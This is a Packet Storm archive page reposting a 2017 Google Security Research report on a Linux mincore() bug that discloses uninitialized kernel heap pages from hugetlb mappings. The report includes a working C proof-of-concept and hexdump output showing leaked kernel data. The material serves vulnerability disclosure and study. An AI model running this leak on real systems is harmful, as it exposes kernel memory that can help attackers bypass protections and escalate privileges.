exploit the possibilities

Linux mincore() Kernel Heap Page Disclosure

Linux mincore() Kernel Heap Page Disclosure
Posted Nov 25, 2017
Authored by Jann Horn, Google Security Research

Linux mincore() discloses uninitialized kernel heap pages. When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.

tags | exploit, kernel
systems | linux
MD5 | bd34c6c3fcf525c4eeb4d8210cfb768c

Linux mincore() Kernel Heap Page Disclosure

Change Mirror Download
Linux: mincore() discloses uninitialized kernel heap pages 




I found the following bug with an AFL-based fuzzer:

When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.

This bug can be reproduced with the following testcase:


$ cat mincore_test.c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>

unsigned char mcbuf[0x1000];

int main(void) {
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");

for (int i=0; i<10000; i++) {
if (mincore((void*)0x86000000, 0x1000000, mcbuf))
perror("mincore");
write(1, mcbuf, 0x1000);
}
}
$ gcc -o mincore_test mincore_test.c -Wall
$ ./mincore_test | hexdump -C | head
00000000 00 00 00 00 00 00 00 00 00 00 00 00 fe 01 00 00 |................|
00000010 80 49 3d 20 c6 e9 ff ff c0 49 3d 20 c6 e9 ff ff |.I= .....I= ....|
00000020 00 08 3c 20 c6 e9 ff ff 40 08 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000030 80 08 3c 20 c6 e9 ff ff c0 08 3c 20 c6 e9 ff ff |..< ......< ....|
00000040 00 09 3c 20 c6 e9 ff ff 40 09 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000050 80 09 3c 20 c6 e9 ff ff c0 09 3c 20 c6 e9 ff ff |..< ......< ....|
00000060 00 06 3c 20 c6 e9 ff ff 40 06 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000070 80 06 3c 20 c6 e9 ff ff c0 06 3c 20 c6 e9 ff ff |..< ......< ....|
00000080 00 07 3c 20 c6 e9 ff ff 40 07 3c 20 c6 e9 ff ff |..< ....@.< ....|
00000090 80 07 3c 20 c6 e9 ff ff 80 78 84 0b c6 e9 ff ff |..< .....x......|

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.



Found by: jannh

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    11 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close